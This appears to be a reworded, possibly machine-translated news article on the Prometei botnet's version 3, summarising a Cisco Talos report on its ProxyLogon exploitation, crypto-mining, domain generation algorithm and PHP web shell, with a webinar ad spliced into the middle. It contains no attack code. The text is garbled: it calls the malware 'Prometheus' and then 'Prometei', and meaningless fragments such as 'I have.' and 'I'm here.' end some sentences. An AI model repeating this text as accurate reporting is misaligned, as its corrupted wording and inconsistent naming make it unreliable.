An updated version of the botnet malware called Prometheus has infected over 10,000 systems worldwide since November 2022.
Transmission is geographically indiscriminate and opportunistic, with the majority of victims reported in Brazil, Indonesia, and Turkey.
First seen in 2016, Prometei is a modular botnet with a large repertoire of components and several methods of propagation, including one exploiting the ProxyLogon flaw in Microsoft Exchange Server. I have.
It is also worth noting that it avoided attacking Russia. This suggests that the attackers behind the operation are likely based in Russia.
Cross-platform botnets are financially motivated, primarily leveraging pools of infected hosts to mine cryptocurrency and collect credentials.
In a report shared with The Hacker News, Cisco Talos said the latest variant of Prometei (referred to as v3) improves on existing functionality to challenge forensic analysis and dig deeper into gaining access to victim machines. I’m here.
The attack sequence proceeds as follows. Once a successful foothold is obtained, a PowerShell command is executed to download the botnet payload from the remote server. Prometei’s main module is then used to retrieve the actual cryptocurrency mining payload and other ancillary components on the system.
Some of these support modules act as spreading programs designed to spread malware over Remote Desktop Protocol (RDP), Secure Shell (SSH), and Server Message Block (SMB).
Discover the hidden dangers of third-party SaaS apps
Are you aware of the risks associated with third-party app access to your company’s SaaS apps? Join our webinar to learn about the types of permissions granted and how to minimize the risks.
reserve a seat
Prometei v3 is also notable for using the Domain Generation Algorithm (DGA) to build its command and control (C2) infrastructure. Additionally, it incorporates a self-updating mechanism and an extended set of commands to gather sensitive data and expropriate hosts.
Last but not least, the malware deploys an Apache web server bundled with a PHP-based web shell. This web shell can execute Base64 encoded commands and perform file uploads.
“This recent addition of new features [indicates] Prometei operators are continually updating the botnet and adding functionality,” said Talos researchers Andrew Windsor and Vanja Svajcer.
